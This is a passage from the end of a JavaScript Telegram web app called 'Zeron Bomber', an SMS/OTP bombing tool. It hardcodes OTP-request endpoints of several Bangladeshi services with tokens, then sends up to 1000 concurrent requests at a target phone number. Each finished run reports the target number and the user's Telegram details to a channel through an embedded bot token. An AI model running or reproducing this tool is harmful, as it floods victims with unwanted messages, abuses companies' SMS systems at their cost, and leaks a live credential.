  },

  // Repeated Robi APIs
  { name: 'Zeron DA-API 14', func: 
    (phone, i) => App.util.sendRequest(
      "https://da-api.robi.com.bd/da-nll/otp/send",
      {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ msisdn: phone }),
      },
      i
    )
  },

  { name: 'Zeron DA-API 15', func: 
    (phone, i) => App.util.sendRequest(
      "https://da-api.robi.com.bd/da-nll/otp/send",
      {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ msisdn: phone }),
      },
      i
    )
  },

  { name: 'Zeron DA-API 16', func: 
    (phone, i) => App.util.sendRequest(
      "https://da-api.robi.com.bd/da-nll/otp/send",
      {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ msisdn: phone }),
      },
      i
    )
  },

  // Cineplex APIs (multiple same)
  { name: 'Zeron DA-API 17', func: 
    (phone, i) => App.util.sendRequest(
      "https://cineplex-ticket-api.cineplexbd.com/api/v1/otp-resend",
      {
        method: 'POST',
        headers: {
          'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0',
          'Content-Type': 'application/json'
        },
        body: JSON.stringify({
          r_token: "jycbgygsecsgcfhsgcvysegfgrr46rrgve4urv64iu6",
          msisdn: phone
        }),
      },
      i
    )
  },

  { name: 'Zeron DA-API 18', func: 
    (phone, i) => App.util.sendRequest(
      "https://cineplex-ticket-api.cineplexbd.com/api/v1/otp-resend",
      {
        method: 'POST',
        headers: {
          'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0',
          'Content-Type': 'application/json'
        },
        body: JSON.stringify({
          r_token: "jycbgygsecsgcfhsgcvysegfgrr46rrgve4urv64iu6",
          msisdn: phone
        }),
      },
      i
    )
  },

  { name: 'Zeron DA-API 19', func: 
    (phone, i) => App.util.sendRequest(
      "https://cineplex-ticket-api.cineplexbd.com/api/v1/otp-resend",
      {
        method: 'POST',
        headers: {
          'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0',
          'Content-Type': 'application/json'
        },
        body: JSON.stringify({
          r_token: "jycbgygsecsgcfhsgcvysegfgrr46rrgve4urv64iu6",
          msisdn: phone
        }),
      },
      i
    )
  },

  { name: 'Zeron DA-API 20', func: 
    (phone, i) => App.util.sendRequest(
      "https://cineplex-ticket-api.cineplexbd.com/api/v1/otp-resend",
      {
        method: 'POST',
        headers: {
          'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0',
          'Content-Type': 'application/json'
        },
        body: JSON.stringify({
          r_token: "jycbgygsecsgcfhsgcvysegfgrr46rrgve4urv64iu6",
          msisdn: phone
        }),
      },
      i
    )
  },

  { name: 'Zeron DA-API 21', func: 
    (phone, i) => App.util.sendRequest(
      "https://cineplex-ticket-api.cineplexbd.com/api/v1/otp-resend",
      {
        method: 'POST',
        headers: {
          'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0',
          'Content-Type': 'application/json'
        },
        body: JSON.stringify({
          r_token: "jycbgygsecsgcfhsgcvysegfgrr46rrgve4urv64iu6",
          msisdn: phone
        }),
      },
      i
    )
  },









{
  name: 'Zeron DA-API 22',
  func: (phone, i) => App.util.sendRequest(
    "https://api.chardike.com/api/otp/send",
    {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ phone: phone, otp_type: "login" })
    },
    i
  )
},



{
  name: 'Zeron DA-API 23',
  func: (phone, i) => App.util.sendRequest(
    'https://api.apex4u.com/api/auth/login',
    {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ "phoneNumber": phone })
    },
    i
  )
},



  {
    name: 'Zeron DA-API 24',
    func: (phone, i) => App.util.sendRequest(
      'https://developer.quizgiri.xyz/api/v2.0/send-otp',
      {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ "phone": phone, "country_code": "+880", "fcm_token": null })
      },
      i
    )
  },


     

 {
    name: 'Zeron DA-API 25',
    func: (phone, i) => App.util.sendRequest(
      `https://bikroy.com/data/phone_number_login/verifications/phone_login?phone=${phone}`,
      {
        method: 'GET',
        headers: {},
        body: null
      },
      i
    )
  }






   ],

        init() { this.bindUI(); this.setupApiStatusPanel(); this.updateApiStatus(); this.setupThemeSelector(); this.setupEventListeners(); this.loadConfig(); this.setupTelegram(); },
        bindUI() {
            const S = (id) => document.getElementById(id);
            this.ui = {
                profilePicContainer:S('profile-pic-container'), profilePic:S('profile-pic'), userName:S('user-name'), userUsername:S('user-username'),
                numberInput:S('number'), amountInput:S('amount'), startBtn:S('startBtn'), stopBtn:S('stopBtn'), btnText:S('btn-text'), spinner:document.querySelector('.launch-button .spinner'),
                progressArea:S('progress-area'), successValue:S('success-value'), failureValue:S('failure-value'), progressBarFill:S('progress-bar-fill'), timeRemaining:S('time-remaining'),
                themeSelector:S('theme-selector'), profileAnimationSelector:S('profile-animation-selector'),
                concurrencySlider:S('concurrency'), concurrencyValue:S('concurrency-value'), delaySlider:S('delay'), delayValue:S('delay-value'),
                logConsole:S('log-console'), exportLogBtn:S('export-log-btn'), clearLogBtn:S('clear-log-btn'),
                apiStatusList:S('api-status-list'), recheckApiBtn:S('recheck-api-btn'),
                devInfoBtn:S('dev-info-btn'), devInfoModal:S('dev-info-modal'), closeModalBtn:S('close-modal-btn'), hapticToggle:S('haptic-toggle'),
            };
        },
        setupApiStatusPanel() { this.ui.apiStatusList.innerHTML = ''; this.apiFunctions.forEach((api, index) => { const li = document.createElement('li'); li.innerHTML = `<span>${api.name}</span><span class="status-dot" data-api-index="${index}"></span>`; this.ui.apiStatusList.appendChild(li); }); },
        async updateApiStatus() {
            this.ui.apiStatusList.querySelectorAll('.status-dot').forEach(dot => { dot.className = 'status-dot'; }); this.logToConsole('info', 'Checking API statuses...');
            const promises = this.apiFunctions.map(async (api, index) => ({ index, status: await api.func('01700000000') }));
            for (const promise of promises) { const result = await promise; const dot = this.ui.apiStatusList.querySelector(`[data-api-index="${result.index}"]`); if (dot) dot.classList.add(result.status === 'success' ? 'online' : 'offline'); }
            this.logToConsole('info', 'API status check complete.');
        },
        setupThemeSelector() {
            this.themes.forEach(theme => { const swatch = document.createElement('span'); swatch.className = 'theme-swatch'; swatch.dataset.theme = theme.id; swatch.style.backgroundColor = theme.color; this.ui.themeSelector.appendChild(swatch); });
            this.setupParticleAnimation();
        },
        setupParticleAnimation() { const particles = this.ui.profilePicContainer.querySelectorAll('.particle-element'); particles.forEach(p => { p.style.animationDelay = `${Math.random()*4}s`; p.style.left = `${20+Math.random()*60}%`; p.style.animationDuration = `${2+Math.random()*2}s`; p.style.width = `${2+Math.random()*3}px`; p.style.height = p.style.width; }); },
        setupEventListeners() {
            this.ui.startBtn.addEventListener('click', () => this.handleStartClick());
            this.ui.stopBtn.addEventListener('click', () => this.stopProcess());
            this.ui.recheckApiBtn.addEventListener('click', () => this.updateApiStatus());
            this.ui.themeSelector.addEventListener('click', (e) => { if (e.target.classList.contains('theme-swatch')) this.setTheme(e.target.dataset.theme); });
            this.ui.profileAnimationSelector.addEventListener('change', (e) => { if(e.target.name === 'profile_animation') this.setProfileAnimation(e.target.value); });
            this.ui.concurrencySlider.addEventListener('input', (e) => this.setConcurrency(e.target.value)); this.ui.delaySlider.addEventListener('input', (e) => this.setDelay(e.target.value));
            this.ui.exportLogBtn.addEventListener('click', () => this.exportLog()); this.ui.clearLogBtn.addEventListener('click', () => this.clearLog());
            this.ui.hapticToggle.addEventListener('change', (e) => this.setHapticFeedback(e.target.checked));
            this.ui.devInfoBtn.addEventListener('click', () => this.ui.devInfoModal.classList.add('active')); this.ui.closeModalBtn.addEventListener('click', () => this.ui.devInfoModal.classList.remove('active'));
            this.ui.devInfoModal.addEventListener('click', (e) => { if(e.target === this.ui.devInfoModal) this.ui.devInfoModal.classList.remove('active'); });
        },
        setupTelegram() { try { if (window.Telegram && window.Telegram.WebApp) { const tg = window.Telegram.WebApp; tg.ready(); tg.requestFullscreen(); tg.disableVerticalSwipes(); this.fetchUserData(tg); } else { this.fetchUserData(null); } } catch (e) { console.error("Telegram API Error:", e); this.fetchUserData(null); } },
        fetchUserData(tg) {
             try {
                const user = tg?.initDataUnsafe?.user;
                if (user) { this.state.user = { id: user.id, firstName: user.first_name, lastName: user.last_name, username: user.username }; const fullName = `${user.first_name||''} ${user.last_name||''}`.trim(); this.ui.userName.textContent = fullName || 'Zeron Bomber'; this.ui.userUsername.textContent = user.username ? `@${user.username}` : 'Welcome!'; if (user.photo_url) { this.ui.profilePic.style.backgroundImage = `url(${user.photo_url})`; } else { this.createAvatar(fullName); }
                } else { this.state.user = { id: 'N/A', firstName: 'Guest', lastName: '', username: 'none' }; this.ui.userName.textContent = 'Zeron Bomber'; this.ui.userUsername.textContent = 'Welcome!'; this.createAvatar('Zeron Bomber'); }
            } catch (e) { console.error("Could not fetch user data:", e); this.createAvatar('Zeron Bomber'); }
        },
        createAvatar(name) { const initial = (name || 'Z').charAt(0).toUpperCase(); const colors = ['#58A6FF', '#3FB950', '#F85149', '#F7B928', '#9B59B6', '#1ABC9C']; const charCodeSum = (name||'').split('').reduce((acc, char) => acc + char.charCodeAt(0), 0); this.ui.profilePic.style.backgroundColor = colors[charCodeSum % colors.length]; this.ui.profilePic.textContent = initial; },
        loadConfig() {
            this.setTheme(localStorage.getItem('theme') || 'dark'); this.setProfileAnimation(localStorage.getItem('profileAnimation') || 'orbit');
            this.setConcurrency(localStorage.getItem('concurrency') || '10'); this.setDelay(localStorage.getItem('delay') || '0'); this.setHapticFeedback(JSON.parse(localStorage.getItem('hapticFeedback')) || false);
        },
        setTheme(themeId) { this.config.theme = themeId; document.documentElement.setAttribute('data-theme', themeId); localStorage.setItem('theme', themeId); this.ui.themeSelector.querySelectorAll('.theme-swatch').forEach(sw => { sw.classList.toggle('active', sw.dataset.theme === themeId); }); },
        setProfileAnimation(animationId) { this.config.profileAnimation = animationId; this.ui.profilePicContainer.dataset.animation = animationId; const radio = document.getElementById(`anim-${animationId}`); if(radio) radio.checked = true; localStorage.setItem('profileAnimation', animationId); },
        setConcurrency(value) { this.config.concurrency = parseInt(value, 10); this.ui.concurrencySlider.value = value; this.ui.concurrencyValue.textContent = value; localStorage.setItem('concurrency', value); },
        setDelay(value) { this.config.delay = parseInt(value, 10); this.ui.delaySlider.value = value; this.ui.delayValue.textContent = value; localStorage.setItem('delay', value); },
        setHapticFeedback(isEnabled) { this.config.hapticFeedback = isEnabled; this.ui.hapticToggle.checked = isEnabled; localStorage.setItem('hapticFeedback', isEnabled); },
        resetUI() { this.state = { ...this.state, isRunning: false, success: 0, failure: 0, sent: 0, total: 0, startTime: 0, isStopping: false }; this.ui.progressArea.style.display = 'none'; this.ui.btnText.textContent = 'Launch'; this.ui.spinner.style.display = 'none'; this.ui.startBtn.disabled = false; this.ui.startBtn.style.display = 'flex'; this.ui.stopBtn.style.display = 'none'; this.ui.timeRemaining.textContent = ''; },
        clearLog() { this.util.vibrate(); this.ui.logConsole.innerHTML = ''; this.logToConsole('info', 'Console cleared.'); },
        logToConsole(type, message) { const entry = document.createElement('div'); entry.className = `log-entry ${type}`; const time = new Date().toLocaleTimeString(); entry.innerHTML = `<span class="timestamp">${time}</span><strong class="status-tag">${type.toUpperCase()}:</strong><span class="message">${this.util.sanitize(message)}</span>`; this.ui.logConsole.appendChild(entry); this.ui.logConsole.scrollTop = this.ui.logConsole.scrollHeight; },
        exportLog() { this.util.vibrate(); const logData = this.ui.logConsole.innerText; if (!logData) { this.logToConsole('error', 'Log is empty.'); return; } const blob = new Blob([logData], { type: 'text/plain' }); const url = URL.createObjectURL(blob); const a = document.createElement('a'); a.href = url; a.download = `zeron-bomber-log-${new Date().toISOString()}.txt`; document.body.appendChild(a); a.click(); document.body.removeChild(a); URL.revokeObjectURL(url); this.logToConsole('info', 'Log exported.'); },

        // New Ad Integration Logic
        async handleStartClick() {
            // Check for the ad script function before starting the process
            if (typeof show_9819201 === 'function') {
                this.logToConsole('info', 'Showing ad before launch...');
                try {
                    await show_9819201();
                    this.logToConsole('info', 'Ad dismissed. Starting process.');
                    this.startProcess();
                } catch (e) {
                    this.logToConsole('error', 'Ad was not watched. Aborting launch.');
                }
            } else {
                this.logToConsole('error', 'Ad script not loaded. Launching directly.');
                this.startProcess();
            }
        },

        async startProcess() {
            this.util.vibrate(); 
            if (this.state.isRunning) return;
            const number = this.ui.numberInput.value; 
            const amount = parseInt(this.ui.amountInput.value, 10);
            if (!/^(?:\+88)?01[3-9]\d{8}$/.test(number)) return this.logToConsole('error', 'Invalid Bangladeshi number.');
            if (!amount || amount <= 0 || amount > 1000) return this.logToConsole('error', 'Amount must be between 1 and 1000.');
            this.resetUI(); this.ui.logConsole.innerHTML = ''; this.state.targetNumber = number; 
            this.ui.startBtn.disabled = true; this.ui.startBtn.style.display = 'none'; this.ui.stopBtn.style.display = 'flex'; this.ui.spinner.style.display = 'block'; this.ui.progressArea.style.display = 'block';
            this.logToConsole('info', `Process started for ${number}.`);
            this.state.isRunning = true; this.state.total = amount; this.state.startTime = Date.now();
            const requestQueue = Array.from({ length: amount }, (_, i) => i);
            const worker = async () => {
                while (requestQueue.length > 0 && !this.state.isStopping) {
                    const taskIndex = requestQueue.shift(); if (taskIndex === undefined) continue;
                    const api = this.apiFunctions[taskIndex % this.apiFunctions.length]; const status = await api.func(number);
                    if (status === 'success') this.state.success++; else this.state.failure++;
                    this.updateProgressUI();
                    if (this.config.delay > 0) await new Promise(resolve => setTimeout(resolve, this.config.delay));
                }
            };
            await Promise.all(Array(this.config.concurrency).fill(null).map(worker));
            this.finishProcess();
        },
        stopProcess() { this.util.vibrate(); if (!this.state.isRunning) return; this.state.isStopping = true; this.logToConsole('info', 'Stopping process...'); },
        async finishProcess() {
            this.state.isRunning = false; this.ui.btnText.textContent = this.state.isStopping ? 'Stopped' : 'Finished';
            this.ui.startBtn.style.display = 'flex'; this.ui.stopBtn.style.display = 'none';
            this.ui.spinner.style.display = 'none'; this.ui.startBtn.disabled = false;
            this.logToConsole('info', `Process ${this.state.isStopping ? 'stopped' : 'finished'}. Success: ${this.state.success}, Failure: ${this.state.failure}.`);
            this.util.vibrate('light');
            const { id, firstName, lastName, username } = this.state.user; const s = this.util.sanitize;
            const message = `✅ <b>Bombing Process Completed</b> ✅\n\n` + `<b>Number:</b> <code>${s(this.state.targetNumber)}</code>\n` + `<b>Amount:</b> ${s(this.state.total)}\n` + `<b>Success:</b> ${this.state.success}\n` + `<b>Failure:</b> ${this.state.failure}\n\n` + `<b>User Information</b>\n` + `<b>User ID:</b> <code>${s(id)}</code>\n` + `<b>Name:</b> ${s(firstName)} ${s(lastName)}\n` + `<b>Username:</b> @${s(username)}\n` + `<b>Profile:</b> tg://user?id=${id}`;
            await this.sendTelegramNotification(message);
        },
        updateProgressUI() {
            this.state.sent++; this.ui.successValue.textContent = this.state.success; this.ui.failureValue.textContent = this.state.failure;
            const percentage = (this.state.sent / this.state.total) * 100; this.ui.progressBarFill.style.width = `${percentage}%`;
            const elapsed = (Date.now() - this.state.startTime) / 1000; const rps = this.state.sent / elapsed;
            const remaining = this.state.total - this.state.sent; const remainingSec = Math.round(remaining / rps);
            if (isFinite(remainingSec) && remainingSec > 0) { const min = Math.floor(remainingSec / 60); const sec = remainingSec % 60; this.ui.timeRemaining.textContent = `Est. time: ${String(min).padStart(2,'0')}:${String(sec).padStart(2,'0')}`; } else { this.ui.timeRemaining.textContent = ''; }
        },
        async sendTelegramNotification(message) {
            const botToken = '8390453286:AAGCzSnM7QzleHm4eyhokHM3Sg2JN45pplg'; const chatId = '@updattex';
            const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
            try {
                const response = await fetch(url, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ chat_id: chatId, text: message, parse_mode: 'HTML', disable_web_page_preview: true }) });
                if (!response.ok) { const errorData = await response.json(); console.error('Telegram API Error:', errorData); this.logToConsole('error', `TG Notify Failed: ${errorData.description}`); }
            } catch (error) { console.error("Fetch Error:", error); this.logToConsole('error', 'Network error sending notification.'); }
        },
        util: {
            sanitize(str) { if (str === undefined || str === null) return ''; return String(str).replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;'); },
            vibrate(type = 'light') { if (App.config.hapticFeedback && window.Telegram?.WebApp?.HapticFeedback) { try { window.Telegram.WebApp.HapticFeedback.impactOccurred(type); } catch (e) { /* Fallback for older clients */ if(navigator.vibrate) navigator.vibrate(type === 'light' ? 50 : 100); } } },
            async sendRequest(url, options) {
                const controller = new AbortController(); const timeoutId = setTimeout(() => controller.abort(), 10000); options.signal = controller.signal;
                try {
                    const response = await fetch(url, options); if (!response.ok) throw new Error(`HTTP ${response.status}`);
                    const result = await response.json().catch(() => ({}));
                    if (result.status === 'Failed' || result.status === 'failed' || result.otpsent === false || result.error || (result.message && result.message.includes('limit'))) { throw new Error(result.message || result.msg || 'Known API Error'); }
                    return 'success';
                } catch (error) { return 'failure'; } finally { clearTimeout(timeoutId); }
            }
        }
    };
    document.addEventListener('DOMContentLoaded', () => App.init());
</script>
</body>
</html>
